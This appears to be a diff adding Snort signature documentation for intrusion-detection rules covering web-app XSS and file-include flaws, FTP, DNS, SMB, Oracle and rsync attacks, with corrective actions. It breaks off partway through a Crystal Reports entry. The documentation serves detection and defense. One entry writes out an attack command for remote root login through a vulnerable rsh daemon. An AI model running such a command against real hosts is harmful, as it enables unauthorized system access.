+This event indicates that DoS traffic has been detected. An attempt to exhaust resources on a host may be underway leading to the host being unavailable for legitimate use.
+
+--
+Attack Scenarios:
+An attacker may attempt to exhaust resources available on a host leading to the host being unable to respond to legitimate requests.
+
+--
+Ease of Attack:
+Simple to Difficult.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000843.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000843
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Koobi Pro" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "showtopic" parameter in the "index.php" script used by the "Koobi Pro" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Koobi Pro
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1242.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1242
+
+--
+Summary:
+This event is generated when an attempt is made to access the .ida Indexing Service ISAPI filter. 
+
+--
+Impact:
+Intelligence gathering activity. If an .ida file is erroneously shared from a network share, an error message is returned from a request that contains the share path will be disclosed.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) installs several Internet Service Application Programming Interface (ISAPI) extensions.  The .ida ISAPI filter provides support for administrative scripts.  Files with the .ida suffix should not be located on network shares.  If an attempt is made to access them from a network share, an error message is returned disclosing the share path.  
+
+--
+Affected Systems:
+Hosts running IIS 4.0
+Hosts running IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can attempt to access a file with the .ida suffix in an attempt to receive an error message with disclosure about the share path.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+The HotSaNIC (hotsanic.sourceforge.net) System and Network Info Centre
+can graph the occurence of worms attacks on a server against time. The
+HotSaNIC system displays 'WEB-IIS ISAPI .ida access' attempts on the
+server in images named default.ida-year.gif, default.ida-month.gif,
+default.ida-week.gif and also using a web page default.ida.html. Each
+time any of these components are accessed it generates an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Do not place files with the .ida suffix on a network share.
+ 
+
+--
+Contributors:
+Original rule written by Dr SuSE and C. Mayor 
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+False positive information contributed by Chris McMahon <chris@mcmahon.co.uk>
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS552
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0071
+
+
+--
--- /dev/null
+++ b/doc/signatures/1971.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+1971
+
+--
+Summary:
+Someone has attempted a format string attack that is successful against 
+the SITE EXEC command on vulnerable versions of WU-FTPD.
+
+
+--
+Impact:
+Severe; remote root compromise possible if user is running a version of 
+WU-FTPD prior to 2.6.2 as root.
+
+
+--
+Detailed Information:
+This attack is a format string attack against the implementation of the 
+SITE EXEC command in Washington University's ftp daemon.  This 
+vulnerability was widespread, due to the widespread use of wu-ftpd in 
+many of the Linux distributions. 
+
+This is an input validation problem, as wu-ftpd is not checking the user
+input that is passed directly into a format string for a printf/sprintf 
+function. With specific malicious data, it is possible to overwrite the 
+return address of the stack.  If properly done, when the function 
+attempts to return, it will return to the overwritten return address of 
+the function and it is possible to execute arbitrary commands.
+
+If running a vulnerable version of WU-FTPD as an anonymous ftp server, 
+this increases the exploitability dramatically, as the exploit must run 
+after a "user" has logged into the server.  Running the server allowing 
+anonymous logins means that any user, anywhere can log into the ftp 
+server and run the command.
+
+--
+Affected Systems:
+	Multiple vendor distributions of wuftpd  2.6.1 and earlier.  
+
+--
+Attack Scenarios:
+Attacker logs into an anonymous ftp server, checks to see if the SITE 
+EXEC command is implemented, and if it is, exploits the format string 
+attack, and executing arbitrary commands on the server. In most default 
+implementations of WU-FTPD the daemon was running as root and allowed 
+anonymous login.  If this is the case, the attacker would now have root 
+access to the system.   
+
+--
+Ease of Attack:
+Simple. Exploit scripts are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patch all instances of WU-FTPD to the latest version, 2.6.2, as well 
+disallow anonymous access to the server.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Mike Poor <mike.poor@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000729.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000729
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "functions.inc" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "functions.inc" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000333.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000333
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Artmedic Newsletter" application running on a webserver. Access to the file "log.php" using a remote file being passed as the "logfile" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "logfile" parameter in the "log.php" script used by the "Artmedic Newsletter" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Artmedic Newsletter
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2520.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2520
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2996.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2996
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1992.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+1992
+
+--
+Summary:
+This event is generated when an attempt is made to list directories outside the ftp root directory.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can lead to information disclosure and possible exposure of sensitive system information.
+
+--
+Detailed Information:
+Some versions of the QVT FTP server from QPC Software allows browsing the directory structure of a host using a directory traversal technique.
+
+--
+Affected Systems:
+QPC Software QVT/Net 4.0 for Windows NT, 2000 and 9x
+QPC Software QVT/Term 5.0 for Windows NT, 2000 and 9x
+Other FTP servers may be vulnerable
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal technique, to browse folders outside the ftp root directory. Information gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/106-4.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+106-4
+
+--
+Summary:
+This event is generated when the pre-processor spp_rpc_decode detects
+network traffic that may constitute an attack. Specifically an
+incomplete rpc segment was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_rpc_decode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2221.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2221
+
+--
+Summary:
+This event is generated when an attempt is made to access ws_mail.cgi on an internal web server. This may indicate an attempt to exploit a remote command execution vulnerability in cgiCentral WebStore 400 4.14.
+
+--
+Impact:
+Execution of arbitrary code. An attacker must be an authenticated WebStore administrator to successfully execute this exploit.
+
+--
+Detailed Information:
+cgiCentral WebStore 400 is an online shopping cart application for web servers. It contains a vulnerability in the "kill" parameter, where a malicious user with an authorized administrative WebStore account can execute arbitrary code on the web server and gain root access to the compromised server. 
+
+--
+Affected Systems:
+Any web server running cgiCentral WebStore 400 4.14 or WebStore 400 CS 4.14.
+
+--
+Attack Scenarios:
+An attacker with a valid WebStore administrator account sends a specially crafted HTTP request with shell commands in the URL's kill parameter. The shell commands are then executed with the security context of the server, allowing the attacker to obtain root access to the compromised machine.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses ws_mail.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is unknown if this vulnerability was fixed with WebStore 4.15. Contact the vendor, RDC Software (http://www.ratite.com/) for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/2861
+
+--
--- /dev/null
+++ b/doc/signatures/1336.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1336
+
+--
+Summary:
+Attempted chmod command access via web
+
+--
+Impact:
+Attempt to change file permissions on a webserver.
+
+--
+Detailed Information:
+This is an attempt to change file permissions on a machine. Using this
+command an attacker may change the permissions of a file to suit his own
+needs, make a file readable, writeable or excutable to other groups and
+users that wouldotherwise not have these special permissions.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/chmod'
+in the URI whichcan then change file permissions of files present on
+the host.Thiscommand may also be requested on a command line should
+the attacker gainaccess to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside ofit's designated web root or cgi-bin.Whenever possible,
+sensitive files andcertain areas of the filesystem should have the
+system immutable flagset to negate the use of the chmod command. On
+BSD derived systems,setting the systems runtime securelevel also
+prevents the securelevelfrom being changed. (note: the securelevel can
+only beincreased)
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1337
+sid: 1338
+
+man chmod
+
+--
--- /dev/null
+++ b/doc/signatures/2561.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2561
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with rsync.
+
+--
+Impact:
+A successful attack may allow files to be existing files to be overwritten
+or new files created on the rsync server.
+
+--
+Detailed Information:
+rsync is used to remote copy files.  A command line option "--backup-dir"
+can be used to specify a directory where backup files are to be placed.
+There is no validation of the argument supplied to this option to scrutinize
+it for proper formatting.  A malicious user can try to overwrite existing
+files or create new ones on a vulnerable host by supplying a value to
+"--backup-dir" that is relative to the root directory.
+
+--
+Affected Systems:
+Many Unix and Linux distributions running rsync.
+See http://www.securityfocus.com/bid/10247 for affected operating systems.
+
+--
+Attack Scenarios:
+An attacker can send a rsync command supplying the -backup-dir option
+with a path relative to the root file system, overwriting or creating
+new files on the vulnerable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+Run the rsync server in a chroot environment.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0426
+
+Bugtraq:
+http://www.securityfocus.com/bid/10247
+
+--
--- /dev/null
+++ b/doc/signatures/100000424.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000424
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DotWidget CMS" application running on a webserver. Access to the file "feedback.php" using a remote file being passed as the "file_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "file_path" parameter in the "feedback.php" script used by the "DotWidget CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DotWidget CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000611.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000611
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_delete.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2318.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+2318
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Concurrent Versions System (CVS).
+
+--
+Impact:
+Serious. Manipulation of the host file system is possible.
+
+--
+Detailed Information:
+Concurrent Versions System (CVS) is used to track the history of source
+code files when developing software.
+
+Some versions of CVS contain a vulnerability that may allow an attacker
+to create directories or files in the host filesystem external to the
+cvsroot. This is achieved via a malformed module request.
+
+--
+Affected Systems:
+	CVS versions prior to 1.11.10
+
+--
+Attack Scenarios:
+An attacker may send a specially crafted request to a cvs server and
+create files and directories of their choosing in the hosts root
+filesystem. The attacker may then access these files at will to further
+compromise the system.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+If compression is being used in data communications between the CVS
+server and clients, this rule will not generate an event.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0977
+
+--
--- /dev/null
+++ b/doc/signatures/604.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 604
+
+--
+Summary:
+This event is generated due to the use of a suspicious login attempt
+
+-- 
+Impact: 
+Serious. If successful the attacker may have gained superuser access to the host.
+
+--
+Detailed Information: 
+This rule generates an event when a connection is made using "rsh" whilst passing the parameter "-froot".
+
+A bug in some implementations of the "rsh" daemon software allowed remote root access using the "-froot" parameter for the "rsh command"
+
+--
+Attack Scenarios: 
+If a UNIX machine has the "rsh" service running and is vulnerable to this bug, in can be exploited simply by running the "rsh" command with "-froot" flag. For example, rlogin host.foo.com -l -froot
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+Disable the "rsh" service if not used, apply a patch if appropriate.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0113
+
+Arachnids:
+http://www.whitehats.com/info/IDS387
+
+--
--- /dev/null
+++ b/doc/signatures/2814.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2814
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_object_to_flavor
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1581.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1581
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/259.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+259
+
+--
+Summary:
+This event is generated by an attempted buffer overflow associated with incorrect validation of DNS NXT records.
+
+--
+Impact:
+Severe. The DNS server can be compromised allowing the attacker to execute arbitrary commands with the privileges of the user running BIND.
+
+--
+Detailed Information:
+Improper validation of DNS NXT records may allow at attacker to perform a buffer overflow.  This can allow the attacker to execute arbitrary code with the privileges of the user running BIND.
+
+--
+Affected Systems:
+BIND versions 8.2 up to, but not including, 8.2.2.
+
+--
+Attack Scenarios:
+An attacker can launch this exploit to gain remote access to the DNS server.
+
+--
+Ease of Attack:
+Simple.  Code exists to exploit the buffer overflow.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines content based on the exploit code written by ADM.  If the content is changed, the rule may not fire.
+
+--
+Corrective Action:
+Upgrade to a version of BIND 8.2.2 or greater, or patch vulnerable versions of BIND.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-1999-14.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0833
+
+Bugtraq:
+http://www.securityfocus.com/bid/788
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000567.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000567
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Qdig" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "pre_gallery" parameter in the "index.php" 
+script used by the "Qdig" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Qdig
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2582.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2582
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a directory
+traversal associated with the Crystal Reports web viewer.
+
+--
+Impact:
+A successful attack may allow unauthorized files to be viewed or
+possibly deleted.
+
+--
+Detailed Information:
+A vulnerability exists in the Crystal Reports web viewer that may permit
+an attacker to view or delete unauthorized files.  The is due to a
+failure to ensure that that a requested Crystal Report file location
+is in the web root directory, permitting unauthorized files to be
+viewed.
+
+In addition, Crystal Reports assumes that the requested report
+file for viewing is a temporary file and deletes it after the
+web version has been viewed.  This problem combined with the
+directory traversal vulnerability may allow sensitive or valuable
+files to be deleted.
+
+--
